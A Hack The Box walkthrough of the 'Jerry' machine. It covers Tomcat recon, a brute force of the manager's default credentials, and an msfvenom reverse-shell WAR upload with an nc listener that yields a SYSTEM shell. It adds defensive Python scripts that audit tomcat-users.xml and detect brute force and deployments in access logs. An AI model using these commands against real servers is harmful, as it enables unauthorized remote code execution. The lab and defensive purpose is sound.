
🕵 HTB-Writeup : JERRY

Recon

nmap

With nmap we find only one open port (8080), which we identify as a Tomcat server.

nmap -A

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

nmap --script "vuln"

gobuster

With gobuster, we discover a few directories. /manager points to the Tomcat manager application, and we are asked for credentials when we visit that page.

gobuster -u http://10.10.10.95:8080 -w gobuster-wordlist.txt -t 10 

=====================================================
/docs (Status: 302)
/manager (Status: 302)
/examples (Status: 302)
/index.jsp (Status: 200)
=====================================================

Vulnerabilities

We try to connect to http://10.10.10.95:8080/manager/html and intercept the request in Burp.

GET /manager/html HTTP/1.1
Host: 10.10.10.95:8080
Cache-Control: max-age=0
Authorization: Basic YWRtaW46Y291Y291  <----- credentials
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

We identify the header Authorization: Basic YWRtaW46Y291Y291. Basic authentication sends the credentials base64-encoded, not encrypted: this value decodes to admin:coucou. We then try to brute-force the authentication with default Tomcat credentials. I found a list on GitHub.

Again in Burp, we send the request to Intruder and launch the attack with our payloads.

[Screenshot: setting the payload positions in Intruder]

One of the credentials works!

[Screenshot: one payload gets a different response from the others]

We are able to log in to the manager page with these credentials: tomcat:s3cret

Alternatively, the scanner/http/tomcat_mgr_login module in Metasploit does the same job: it tests all the well-known Tomcat default credentials against the manager.
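The root cause here is a manager account left with a well-known default password, so the defender's counterpart to the brute force above is an audit of tomcat-users.xml. The script below is an added example, not part of the original write-up or of Tomcat: it parses a constructed tomcat-users.xml, flags accounts whose username/password pair is in a small constructed sample of default credentials, and flags short passwords on any account holding a deployment role (the roles that allow a WAR upload). The DEFAULT_CREDENTIALS sample, the MIN_PASSWORD_LEN policy and the sample file are all assumptions made for the example.

```python
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml modelled on the file Tomcat ships with, with the
# commented-out example manager account left enabled. Sample data for this
# example, not the configuration of the box.
SAMPLE_TOMCAT_USERS = """\
<tomcat-users>
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deployer" password="CorrectHorseBatteryStaple-9f2c" roles="manager-script"/>
  <user username="monitor" password="r3adonly-status-account" roles="manager-status"/>
</tomcat-users>
"""

# Short constructed sample of well-known default pairs; a real audit would use a
# fuller list such as the one the brute force above was run with.
DEFAULT_CREDENTIALS = {
    ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "admin"),
    ("admin", "tomcat"), ("manager", "manager"), ("role1", "tomcat"),
}

# Any of these roles lets the holder deploy a WAR, which is code execution
# as the account Tomcat runs under (on this box, NT AUTHORITY\SYSTEM).
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}
MIN_PASSWORD_LEN = 12  # assumed password policy for this example


def _local(tag):
    """Strip an XML namespace (Tomcat 8+ files declare one, Tomcat 7 files do not)."""
    return tag.rsplit("}", 1)[-1]


def load_users(xml_text):
    """Return a list of (username, password, set_of_roles) from tomcat-users.xml."""
    users = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        # Tomcat accepts both username= and the older name= attribute
        name = el.get("username") or el.get("name") or ""
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        users.append((name, el.get("password", ""), roles))
    return users


def deploy_capable(xml_text):
    """Usernames that hold at least one deployment role."""
    return {name for name, _, roles in load_users(xml_text) if roles & DEPLOY_ROLES}


def audit_tomcat_users(xml_text):
    """Return (username, finding) pairs for accounts a defender should fix first."""
    findings = []
    for name, password, roles in load_users(xml_text):
        if (name, password) in DEFAULT_CREDENTIALS:
            findings.append((name, "default credentials"))
        if roles & DEPLOY_ROLES and len(password) < MIN_PASSWORD_LEN:
            findings.append((name, "short password on deploy-capable account"))
    return findings


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(*finding)
    print("deploy-capable:", sorted(deploy_capable(SAMPLE_TOMCAT_USERS)))
```

On the sample file the audit reports the tomcat account twice (default credentials, and a 6-character password on an account that can deploy), while the deployer and monitor accounts pass. The fix on a real server is to remove the example account, or to undeploy the manager application entirely if nobody needs it.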

Exploit

We are welcomed by the manager page, which includes a WAR file upload form.

[Screenshot: the manager welcome page]

With msfvenom, it is possible to build a malicious WAR file that spawns a reverse shell once deployed.

We first try the java/shell_reverse_tcp payload to build the WAR.

msfvenom -p java/shell_reverse_tcp lhost=10.10.16.7 lport=4444 -f war -o pwn.war

Then we upload the WAR file to the server. The new application appears in the list.

[Screenshot: the applications list]

We listen on port 4444 (nc -lvnp 4444) while browsing to the /pwn page we just uploaded.

C:\>whoami
whoami
nt authority\system

We got our first shell, and it is already an NT AUTHORITY\SYSTEM prompt: Tomcat runs as SYSTEM on this box.

Both flags are on the Administrator desktop.
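Both the Intruder brute force in the Vulnerabilities section and the WAR upload above leave clear traces in Tomcat's access log, and the Basic header intercepted in Burp is only encoded, never encrypted. The script below is an added example, not code from the original write-up or from Tomcat: it decodes a Basic Authorization value, parses constructed access log lines in the default AccessLogValve format (%h %l %u %t "%r" %s %b), flags a client that collects five or more 401s on /manager/* within sixty seconds and records which account it eventually logged in as, and lists every successful deployment through the manager (the HTML form upload or the text interface). The log lines, the thresholds and the CSRF nonce value are constructed for the example.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Tomcat access log lines (default pattern %h %l %u %t "%r" %s %b).
# Sample data for this example, not the box's logs: a burst of 401s on
# /manager/html, a 200 once a password is guessed, a WAR upload through the
# manager form, and the first request to the freshly deployed application.
SAMPLE_LOG = """\
10.10.16.7 - - [19/Jun/2018:07:15:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.7 - - [19/Jun/2018:07:15:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.7 - - [19/Jun/2018:07:15:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.7 - - [19/Jun/2018:07:15:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.7 - - [19/Jun/2018:07:15:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.7 - - [19/Jun/2018:07:15:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.7 - tomcat [19/Jun/2018:07:15:04 +0000] "GET /manager/html HTTP/1.1" 200 18374
10.10.16.7 - tomcat [19/Jun/2018:07:16:10 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=PLACEHOLDER HTTP/1.1" 200 19622
10.10.16.7 - - [19/Jun/2018:07:16:30 +0000] "GET /pwn/ HTTP/1.1" 200 0
192.168.1.20 - - [19/Jun/2018:07:20:00 +0000] "GET /index.jsp HTTP/1.1" 200 11398
192.168.1.20 - - [19/Jun/2018:07:21:00 +0000] "GET /manager/html HTTP/1.1" 401 2473
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def decode_basic_auth(header_value):
    """Split a 'Basic <base64>' Authorization value into (user, password).
    Basic auth only base64-encodes the pair; it does not encrypt it, which is
    why an intercepting proxy reads admin:coucou straight out of the request."""
    scheme, _, blob = header_value.strip().partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic Authorization header")
    user, _, password = base64.b64decode(blob).decode("utf-8").partition(":")
    return user, password


def parse_log(text):
    """Parse access log lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["time"] = datetime.strptime(e["time"], TIME_FMT)
        e["status"] = int(e["status"])
        e["path"] = e["path"].split("?", 1)[0]  # drop the query string
        entries.append(e)
    return entries


def detect_manager_bruteforce(entries, threshold=5, window=timedelta(seconds=60)):
    """Flag clients with >= threshold 401s on /manager/* inside a sliding window,
    and record the account name if the same client later gets a 200."""
    recent_failures = defaultdict(list)
    alerts = {}
    for e in sorted(entries, key=lambda x: x["time"]):
        if not e["path"].startswith("/manager"):
            continue
        host = e["host"]
        if e["status"] == 401:
            recent_failures[host] = [t for t in recent_failures[host] if e["time"] - t <= window]
            recent_failures[host].append(e["time"])
            if len(recent_failures[host]) >= threshold:
                alerts.setdefault(host, {"failures": 0, "success_as": None})
                alerts[host]["failures"] = len(recent_failures[host])
        elif e["status"] == 200 and host in alerts and e["user"] != "-":
            alerts[host]["success_as"] = e["user"]
    return alerts


def detect_manager_deploy(entries):
    """Return (time, host, user, path) for every successful deployment through
    the manager: the HTML form upload (POST /manager/html/upload) or the text
    interface (PUT /manager/text/deploy). Each one should match a change ticket."""
    deploy_paths = {("POST", "/manager/html/upload"), ("PUT", "/manager/text/deploy")}
    return [
        (e["time"].isoformat(), e["host"], e["user"], e["path"])
        for e in entries
        if (e["method"], e["path"]) in deploy_paths and e["status"] == 200
    ]


if __name__ == "__main__":
    print(decode_basic_auth("Basic YWRtaW46Y291Y291"))
    log = parse_log(SAMPLE_LOG)
    print(detect_manager_bruteforce(log))
    print(detect_manager_deploy(log))
```

On the sample log the brute-force detector reports 10.10.16.7 with six failures and a subsequent login as tomcat, while the single 401 from 192.168.1.20 stays below the threshold; the deployment detector returns the one form upload by tomcat. Because the SYSTEM prompt above comes from the Tomcat service account, the deployment alert is the one to treat as a potential code-execution event rather than a routine release.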

Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,418,774,016 bytes free

C:\Users\Administrator\Desktop\flags>type *

user.txt
7004****************************
root.txt
04a8*****************************

Tags

Easy, External, Tomcat, Penetration Tester Level 1, Remote Code Execution, A05:2021-Security Misconfiguration, Default Credentials, Malicious WAR File Upload